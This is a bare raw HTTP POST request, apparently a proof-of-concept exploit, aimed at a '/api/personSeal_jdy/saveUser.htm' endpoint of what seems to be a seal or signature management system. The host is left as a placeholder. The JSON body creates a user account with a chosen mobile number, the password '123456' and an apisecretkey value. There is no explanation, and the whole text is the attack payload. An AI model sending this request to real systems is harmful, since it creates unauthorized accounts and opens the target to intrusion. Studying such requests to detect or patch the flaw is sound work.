POST /api/personSeal_jdy/saveUser.htm HTTP/1.1
Host: 地址
User-Agent:  Mozilla/5.0  (Windows  NT  10.0;  Win64;  x64)  AppleWebKit/537.36
(KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=ed467a70-91e9-450d-a2c1-db1fab8123ad
Connection: close
Content-Type: application/json
Content-Length: 215

{"op":{},"data":{"mobile":"13333333333","uid":"13333333333","password":"12345
6","name":"testuser","return_url":"https://www.baidu.com","apisecretkey":"1","_id
":"1","mail_address":"111@qq.com"},"b7o4ntosbfp":"="}